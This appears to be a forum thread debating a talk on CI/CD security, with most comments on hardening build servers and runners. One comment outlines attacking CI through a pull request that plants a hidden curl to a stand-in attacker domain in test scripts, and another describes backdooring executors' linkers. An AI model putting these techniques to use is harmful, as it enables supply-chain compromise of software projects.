I have used Jenkins, TeamCity, Bamboo, and GoCD. As with any tool, misconfiguration and a lack of ops involvement are going to lead to clueless implementations. One might as well say "I granted everyone admin access, and they are able to run any command now".
For all these tools, there is documentation on how to lock down access to the server, and also how to run the agents under various user accounts. On my current engagement, for example, I ensure that the various GoCD agents run as low-privileged users, with access granted via sudo.
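As a sketch of what that looks like (the user names and script path here are made up):

    # create an unprivileged account for the agent to run under
    useradd --system --create-home go-agent

    # /etc/sudoers.d/go-agent -- the agent may run exactly one script as the deploy user
    go-agent ALL=(deploy) NOPASSWD: /opt/ci/scripts/deploy.sh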
Further, running commands directly is easy. But a better pattern is to push these commands into a script, check the script into version control, and then check out and run that script. At least GoCD is opinionated that way by enforcing that users use "materials" (which could be a checkout from a revision control system).
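Whether the CI tool does the checkout for you or you script it yourself, a job then boils down to roughly this (repository URL and script name are placeholders):

    git clone https://git.example.com/deploy-scripts.git work   # the "material"
    cd work && ./scripts/deploy.sh                               # the only thing the job runs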
GoCD enforces something called a "sandbox", where file references are restricted to the working directory for that particular job. If one needs to access files outside of this sandbox, then one needs to explicitly invoke a shell - after which point the admin/script owner is responsible for what happens, because the GoCD admin either permitted a command interpreter to be invoked directly or the script owner invoked one within their script.
Nowadays I deliver scripts as Ansible playbooks packaged in GPG-signed RPMs, then execute the playbooks in local mode.
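Roughly (the package and playbook names are made up):

    rpm --checksig deploy-playbooks-1.2-1.noarch.rpm    # verify the GPG signature first
    yum install -y deploy-playbooks-1.2-1.noarch.rpm
    ansible-playbook -i localhost, -c local /opt/playbooks/site.yml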
The unsalted SHA1 passwords are a legitimate finding. GoCD lets users specify either an htpasswd-generated file or an LDAP source. On enterprise implementations, I always link GoCD to an LDAPS source and manage the credentials there.
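For reference, the file-based option is generated with htpasswd, and GoCD's documentation (at least at the time) asked for SHA1 entries, which is exactly the weakness being reported (the file path and user here are made up):

    htpasswd -c -s /etc/go/passwd alice    # -s produces the unsalted {SHA} format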
In short, if one doesn't read the documentation and just implements distributed orchestrators with zero ops sensibilities, then such WTFs as "anyone can execute any command" are of course possible.
This horrifically written document alleges that CI tools are risky because, if they fall, they grant a vector into other parts of the infrastructure. That's also true for just about any machine... even a developer laptop.
Good CI/CD processes improve not only security (fewer crufty servers lying around) but also recovery, because they force you to be able to deploy... to new, external, backup, or refreshed infrastructure if necessary.
This talk is written in a Black Hat idiom: take trendy technology, perform basic risk assessment, find one or more exploitable software security mistakes, generate "catchy" title.
It's unlikely that the author really believes CI tools are so risky that you should avoid them. On the other hand, it's good to know that your CI infrastructure is part of your attack surface; chances are, the author came up with the idea for this talk after exploiting a CI system on a real pentest (I know that happened at Matasano a couple times).
This is why you keep your CI networks in a private VLAN with proxy servers back to the public Internet. You don't just stick your CI servers on your corporate network -- you park them behind a jump server and proxy back anything you need to.
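In practice that means something like this (host names are placeholders):

    # admin access to the CI master only via the jump host
    ssh -J ops@jump.example.com ops@ci-master.internal

    # and on the CI machines themselves, outbound traffic only through a proxy
    export http_proxy=http://proxy.internal:3128
    export https_proxy=http://proxy.internal:3128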
For every project I've set up CI for, it doesn't matter if someone hacks my CI servers, because they don't have access to anything other than dummy data. Sure, you could hack prod systems by building a trojaned version of one of the binaries. But even then the binaries just get uploaded to a repository, so with proper code profiling and security testing you would notice the rogue binary before it ever hits a prod server.
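Even something as simple as recording artifact digests at build time and re-checking them out of band at promotion time helps with that (a sketch; the file names are made up):

    # at build time, record the digest alongside the artifact
    sha256sum app-1.4.2.tar.gz > app-1.4.2.tar.gz.sha256

    # before promotion, verify it from a machine the CI farm cannot write to
    sha256sum -c app-1.4.2.tar.gz.sha256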
It is important to keep CI as a dev process -- deployment should be handled by an orchestration system as it's much more of a tech ops process than a dev process. This is where config management and the like become very important; and those should be left to people who think like operations and security managers rather than hackers who just want to make shit work quickly (there's a place for both inside any good dev org).
Another good reason to keep CI locked out from other networks is to make sure all asset references are properly rewritten. If someone hard-codes an open internet source or, even worse, an internal source, that will generate a 404 when testing, and any unexpected 404s in the log are instant test failures.
Owning someone's CI system via the CI system is all well and good, but not surprising in the slightest. All these things expose web-based admin interfaces, so of course they're vulnerable at the very least to social engineering.
The real trick is owning someone's CI system via the code under test. And it's even more versatile because it works even for projects which keep their executor scripts checked in to source.
1) Check out and gain an understanding of the target's CI scripts
2) Create a pull request (or whatever) which makes some reasonable code change but also introduces a vulnerability into the build/test scripts themselves. For example, curl'ing a domain you control (see the sketch after this list).
3) Kick off pre-commit runs of all the tests to see if your patch should be accepted.
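A hypothetical version of step 2 can be as small as one extra line buried in an otherwise plausible change (the domain is obviously made up):

    # somewhere deep in test/run_integration.sh
    make test && curl -s "https://collector.attacker.example/$(whoami)-$(hostname)" >/dev/null

Step 3 then runs it for you, with whatever credentials and network access the executor happens to have.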
Even when you have control of a project tested by the CI server you should not have control of the CI server itself.
GitLab comes with integrated CI. But all the tests are run by GitLab Runner on external machines. You can spin up (and down) new machines per test with Runner Autoscale if you want.
As far as I could see GitLab CI is not vulnerable to the items mentioned in the article (apart from only enforcing password length, not complexity).
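For what it's worth, the autoscale setup lives in the Runner's config.toml and looks roughly like this (written from memory, so treat the field names as approximate and check the Runner docs):

    concurrent = 4

    [[runners]]
      name     = "autoscale"
      url      = "https://gitlab.example.com/ci"
      token    = "REDACTED"
      executor = "docker+machine"
      [runners.docker]
        image = "alpine"
      [runners.machine]
        IdleCount     = 0              # no warm machines; every job gets a fresh one
        MachineDriver = "amazonec2"
        MachineName   = "ci-runner-%s"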
Yes, sandboxing and ephemeral machines are far and away the best defense a CI system has against compiling/testing malicious code. But the vast majority of CI systems don't actually use ephemeral executors because imaging between runs is slow and rebuilding your whole checkout/object cache is expensive.
You don't need to own the CI server in order to own a project. You can take over all of the individual executors and replace their linker with your own version that links against an attacker-supplied backdoored fork of openssl (for an extreme and topical example). Doesn't even require constantly-running code which might be detected by a monitoring system, and naturally persists across reboots (but not reimagings).
I'm glad that GitLab is paying attention to these things. Travis, which is tightly integrated with GitHub, also seems to do a good job, although I haven't looked into it extensively. But plenty of orgs run self-hosted CI that simply isn't up to proper security standards in this respect.
Heavy GitLab CI user here. The real problem is isolating the runners themselves. You can assign runners to individual projects for isolation, but when the runners can't be AWSed (iOS hardware, for example) you have to make tough choices about buying more stuff to sit under your desk, right next to the idle stuff you could otherwise be using.
IMO some basic isolation measures would be good, like clearing the cache between projects and killing active processes when a job ends.
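Until something like that is built in, a crude between-jobs cleanup on a bare-metal runner might look like this (the user name and paths are made up):

    pkill -9 -u builder || true       # kill anything the previous job left running
    rm -rf /home/builder/cache/*      # don't let one project's cache leak into the next
    rm -rf /home/builder/builds/*     # force a fresh clone for the next job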
Thanks for using GitLab heavily! When running GitLab Runner on metal you can already opt to start with a fresh clone instead of updating, I think. I'm not sure about killing active processes; feel free to create an issue to discuss further.
Every place I've worked, devs have complete access to dev resources like databases, CI servers, and web servers, and usually have access to QA resources; it's only by convention that we don't screw with them without asking for permission.
Why would just anyone have access to production resources, which would be required to take advantage of any of the things he stated?
Also, dev/QA should be on a separate domain anyway.
I'm kind of shocked all y'all commentators have such well secured CI systems. ;)
I've been developing software for 17 years, and at every employer, from 2 to 20,000 employees, CI systems were treated as an afterthought in terms of infrastructure and security resources.
It was dramatically obvious how bad this was from a security perspective, so perhaps this article isn't necessary, but certainly it's right on the money.
We have a CI tool that I've been trying to secure for a long time. Usually when I add something (SSL so people can't sniff passwords / hijack sessions) the response I get from some others is "why bother? If something bad happens the person who does it will be fired!"
It baffles me really. Most of the time I do it anyway. But we still have a few major holes I've been slowly patching. There's one last glaring problem: permissions are controlled by teams in an external tool. Anyone has auth to change teams in said tool.
I'm surprised the article focused on compromising the build farm instead of the danger to production. I guess a malicious agent could alter the behavior of the build that makes it to production and attempt to slide in an extra "feature" like weakened security or a back door.
Nevertheless, it's a good reminder to consider build servers as part of the attack surface.
We use CircleCI, and since all our environments are on a VPN we opted for a pull based solution instead of CircleCI notifying/pushing anything to our servers.
The way it works: Circle pushes the built containers to Google Container Registry, and a super simple tool I built (https://github.com/crufter/puller) pulls those images. This introduces a couple of minutes of delay, but we find that acceptable.
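The pulling side is conceptually just a polling loop like the sketch below (the real puller linked above does more; the image name is made up):

    running=""
    while true; do
      docker pull gcr.io/my-project/api:latest >/dev/null
      latest=$(docker inspect --format '{{.Id}}' gcr.io/my-project/api:latest)
      if [ "$latest" != "$running" ]; then
        docker rm -f api 2>/dev/null || true
        docker run -d --name api gcr.io/my-project/api:latest
        running=$latest
      fi
      sleep 120    # hence the couple of minutes of delay
    done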
I guess we are still exposed to the possibility of someone breaking into Circle, using the keys there to push to our GCR repos, but at least they won't have full access to our servers...
Having code running in a container is still harder to exploit than just having full ssh access to the boxes?
I am not a security expert by any means, and this workflow was not created with security as a top priority either, but the latter still seems worse to me. It might just be an ignorant hunch, though.
That's something really interesting, and it comes in handy for a side project I have, but I don't think it fixes the problem of people hijacking the docker repo - they will just change the Dockerfile itself, right?
Yes, I agree. There are some things you can do: for example, you can have client certificates, so only trusted clients can talk to your CI and only trusted clients can push images. Only devs with ssh keys can push code.
Your CI and registry are locked down (in a container).
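For example, fronting the registry (or the CI web UI) with something like nginx and requiring client certificates gets most of the way there (a sketch; the certificate paths are placeholders):

    server {
        listen 443 ssl;
        ssl_certificate         /etc/nginx/certs/registry.crt;
        ssl_certificate_key     /etc/nginx/certs/registry.key;
        ssl_client_certificate  /etc/nginx/certs/trusted-clients-ca.crt;
        ssl_verify_client       on;    # only clients holding a cert signed by our CA get through
        location / {
            proxy_pass http://127.0.0.1:5000;    # registry bound to localhost only
        }
    }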
My CI server is inside an Amazon VPC, accessible via an ssh tunnel. Only certain people can access the production VPC and everyone's keys have a strong passphrase... why trust your CI tool's security when you can rely on much more robust things like SSH?
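Concretely, access looks something like this (host names are placeholders):

    # forward the CI web UI over ssh through the bastion; nothing is exposed publicly
    ssh -L 8080:ci.internal:8080 ops@bastion.example.com
    # then browse http://localhost:8080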
Since a build server in its most generic form is just a thing that runs commands, this isn't very surprising. I was hoping for more details on how to secure the deployment part, because that's less trivial (access to prod machines and prod service credentials).